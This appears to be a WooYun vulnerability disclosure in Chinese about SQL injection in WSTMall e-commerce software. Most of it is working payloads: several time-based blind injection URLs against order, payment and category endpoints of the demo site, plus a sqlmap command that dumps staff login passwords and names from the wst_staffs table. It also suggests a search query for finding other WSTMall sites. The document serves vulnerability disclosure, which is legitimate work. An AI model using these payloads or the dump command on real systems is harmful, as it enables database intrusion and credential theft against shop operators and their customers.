WooYun.org

案例：百度一下：powered by wstmall
我就不贴代码了，厂商自己找把，都很简单。
http://demo.wstmall.com/index.php/home/goods_cats/querybylist/?id=1) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'--
http://demo.wstmall.com/index.php/home/areas/getAreaAndCommunitysByList/?areaId=1) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'--
http://demo.wstmall.com/index.php/Home/orders/orderCancel/?orderId=1 AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'--
http://demo.wstmall.com/index.php/Home/orders/checkOrderPay/?orderIds=1) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'%23
http://demo.wstmall.com/index.php/Home/orders/orderConfirm/?orderId=1 AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'--
http://demo.wstmall.com/index.php/home/payments/getAlipayURL/?orderIds=1000000013&payCode=1%27) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'%23
//要求orderIds=1000000013时orderStatus必须大于0
上面这些都是盲注，请在demo站注册之后提交。下面这几处请在sqlmap下测试，不是盲注，但是回显不在网页上，回显数据是json要用抓包工具才能看到（这里表示sqlmap强大。。），由于数据包比较复杂我这里就不抓包演示了，sqlmap把！
http://demo.wstmall.com/index.php/Home/payment/topay/?orderIds=1*
http://demo.wstmall.com/index.php/Home/payments/topay/?orderIds=1*
http://demo.wstmall.com/index.php/Home/orders/getorderinfo/?orderId=1*
./sqlmap.py -u "http://demo.wstmall.com/index.php/Home/payment/topay/?orderIds=1*" --cookie="注入的时候记得把登录的cookie传过来，不然没法注入" --threads 10 --batch -D wstmall -T wst_staffs -C loginpwd,staffname --dump